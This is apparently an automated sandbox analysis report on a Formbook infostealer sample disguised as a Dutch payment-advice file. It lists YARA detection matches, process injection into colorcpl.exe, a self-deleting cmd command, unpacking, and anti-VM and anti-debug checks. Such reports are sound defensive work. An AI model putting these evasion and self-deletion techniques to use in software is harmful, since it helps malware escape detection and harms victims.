          Source: 00000007.00000002.909643904.0000000000320000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.909643904.0000000000320000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.Betaling_advies.exe.2680000.1.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.Betaling_advies.exe.2680000.1.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.Betaling_advies.exe.2680000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.Betaling_advies.exe.2680000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.Betaling_advies.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.Betaling_advies.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.1.Betaling_advies.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.1.Betaling_advies.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.1.Betaling_advies.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.1.Betaling_advies.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.Betaling_advies.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.Betaling_advies.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: classification engineClassification label: mal100.troj.evad.winEXE@7/3@15/9
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 0_2_004041E5 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 0_2_004020A6 CoCreateInstance,MultiByteToWideChar,
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5792:120:WilError_01
          Source: C:\Users\user\Desktop\Betaling_advies.exeFile created: C:\Users\user\AppData\Local\Temp\nsx3A69.tmpJump to behavior
          Source: Betaling_advies.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\Betaling_advies.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\Betaling_advies.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: Betaling_advies.exeReversingLabs: Detection: 14%
          Source: C:\Users\user\Desktop\Betaling_advies.exeFile read: C:\Users\user\Desktop\Betaling_advies.exeJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\Betaling_advies.exe 'C:\Users\user\Desktop\Betaling_advies.exe'
          Source: C:\Users\user\Desktop\Betaling_advies.exeProcess created: C:\Users\user\Desktop\Betaling_advies.exe 'C:\Users\user\Desktop\Betaling_advies.exe'
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\SysWOW64\colorcpl.exe
          Source: C:\Windows\SysWOW64\colorcpl.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Betaling_advies.exe'
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Betaling_advies.exeProcess created: C:\Users\user\Desktop\Betaling_advies.exe 'C:\Users\user\Desktop\Betaling_advies.exe'
          Source: C:\Windows\SysWOW64\colorcpl.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Betaling_advies.exe'
          Source: C:\Users\user\Desktop\Betaling_advies.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
          Source: Binary string: C:\xampp\htdocs\Cryptor\74d81a217a414a2aaee1ac9ce14525a2\Loader\Loader\Release\22ct3mhbr.pdb source: Betaling_advies.exe, 00000000.00000002.654453331.0000000000788000.00000004.00020000.sdmp, 571kzkbal.dll.0.dr
          Source: Binary string: colorcpl.pdbGCTL source: Betaling_advies.exe, 00000001.00000002.692704063.0000000000D70000.00000040.00000001.sdmp
          Source: Binary string: colorcpl.pdb source: Betaling_advies.exe, 00000001.00000002.692704063.0000000000D70000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000004.00000000.666885783.0000000005A00000.00000002.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: Betaling_advies.exe, 00000000.00000003.646799474.000000001EEB0000.00000004.00000001.sdmp, Betaling_advies.exe, 00000001.00000002.692105049.0000000000B2F000.00000040.00000001.sdmp, colorcpl.exe, 00000007.00000002.910878162.00000000047BF000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: Betaling_advies.exe, colorcpl.exe
          Source: Binary string: wscui.pdb source: explorer.exe, 00000004.00000000.666885783.0000000005A00000.00000002.00000001.sdmp

          Data Obfuscation:

          barindex
          Detected unpacking (changes PE section rights)Show sources
          Source: C:\Users\user\Desktop\Betaling_advies.exeUnpacked PE file: 1.2.Betaling_advies.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .text:ER;
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 0_2_00401FDC SetErrorMode,GetModuleHandleA,LoadLibraryA,GetProcAddress,FreeLibrary,SetErrorMode,
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_004153DD push ebp; ret
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_0041B3F2 push eax; ret
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_0041B3FB push eax; ret
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_0041B3A5 push eax; ret
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_0041B45C push eax; ret
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00417DC3 pushad ; ret
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00415E10 push edi; ret
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00414F69 push edx; ret
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A8D0D1 push ecx; ret
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_1_004153DD push ebp; ret
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_1_0041B3F2 push eax; ret
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_1_0041B3FB push eax; ret
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_1_0041B3A5 push eax; ret
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_1_0041B45C push eax; ret
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_1_00417DC3 pushad ; ret
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_1_00415E10 push edi; ret
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_1_00414F69 push edx; ret
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_0471D0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_025453DD push ebp; ret
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_0254B3F2 push eax; ret
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_0254B3FB push eax; ret
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_0254B3A5 push eax; ret
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_02545E10 push edi; ret
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_02544F69 push edx; ret
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_0254B45C push eax; ret
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_02547DC3 pushad ; ret
          Source: C:\Users\user\Desktop\Betaling_advies.exeFile created: C:\Users\user\AppData\Local\Temp\nsx3A6A.tmp\571kzkbal.dllJump to dropped file
          Source: C:\Users\user\Desktop\Betaling_advies.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
          Source: C:\Users\user\Desktop\Betaling_advies.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Betaling_advies.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\colorcpl.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          barindex
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\Desktop\Betaling_advies.exeRDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\Betaling_advies.exeRDTSC instruction interceptor: First address: 000000000040896E second address: 0000000000408974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\colorcpl.exeRDTSC instruction interceptor: First address: 00000000025385E4 second address: 00000000025385EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\colorcpl.exeRDTSC instruction interceptor: First address: 000000000253896E second address: 0000000002538974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\Betaling_advies.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_004088A0 rdtsc
          Source: C:\Windows\explorer.exe TID: 6552Thread sleep time: -60000s >= -30000s
          Source: C:\Windows\SysWOW64\colorcpl.exe TID: 6892Thread sleep time: -48000s >= -30000s
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\colorcpl.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\colorcpl.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 0_2_00405301 DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,SetFileAttributesA,RemoveDirectoryA,
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 0_2_00405C94 SetErrorMode,SetErrorMode,FindFirstFileA,SetErrorMode,FindClose,
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 0_2_004026BC FindFirstFileA,
          Source: explorer.exe, 00000004.00000002.920747252.00000000058C0000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: explorer.exe, 00000004.00000000.670369166.000000000A60E000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000004.00000000.667370950.0000000006650000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000004.00000000.670369166.000000000A60E000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000004.00000002.917151213.0000000004710000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000[Wm
          Source: explorer.exe, 00000004.00000002.920747252.00000000058C0000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 00000004.00000000.670564203.000000000A716000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000/
          Source: explorer.exe, 00000004.00000002.920747252.00000000058C0000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: explorer.exe, 00000004.00000000.670650414.000000000A784000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000@
          Source: explorer.exe, 00000004.00000002.920747252.00000000058C0000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Users\user\Desktop\Betaling_advies.exeProcess information queried: ProcessInformation
          Source: C:\Users\user\Desktop\Betaling_advies.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\colorcpl.exeProcess queried: DebugPort
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_004088A0 rdtsc
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00409B10 LdrLoadDll,
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 0_2_72AD1000 Ivlfdpdlcleoxmzl,IsDebuggerPresent,DebugBreak,GetTempPathW,lstrcatW,CreateFileW,GetFileSize,VirtualAlloc,ReadFile,
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 0_2_00401FDC SetErrorMode,GetModuleHandleA,LoadLibraryA,GetProcAddress,FreeLibrary,SetErrorMode,
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 0_2_02651628 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 0_2_02651840 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A620A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A620A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A620A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A620A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A620A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A620A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A790AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A6F0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A6F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A6F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A39080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00AB3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00AB3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A340E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A340E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A340E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A358EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00ACB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00ACB8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00ACB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00ACB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00ACB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00ACB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A6002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A6002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A6002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A6002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A6002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A4B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A4B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A4B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A4B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00B04015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00B04015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00AB7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00AB7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00AB7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00B01074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00AF2073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A50050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A50050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A661A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A661A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00AF49A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00AF49A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00AF49A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00AF49A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00AB69A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00AB51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00AB51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00AB51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00AB51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A6A185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A5C182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A62990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A3B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A3B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A3B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00AC41E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A54120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A54120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A54120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A54120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A54120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A6513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A6513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A39100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A39100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A39100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A3C962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A3B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A3B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A5B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A5B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A352A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A352A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A352A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A352A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A352A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A4AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A4AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A6FAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A6D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A6D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A62AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A62ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A74A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A74A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A48A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A35210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A35210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A35210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A35210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A3AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A3AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A53A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00AFAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00AFAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00AEB260 mov eax, dword ptr fs:[00000030h]
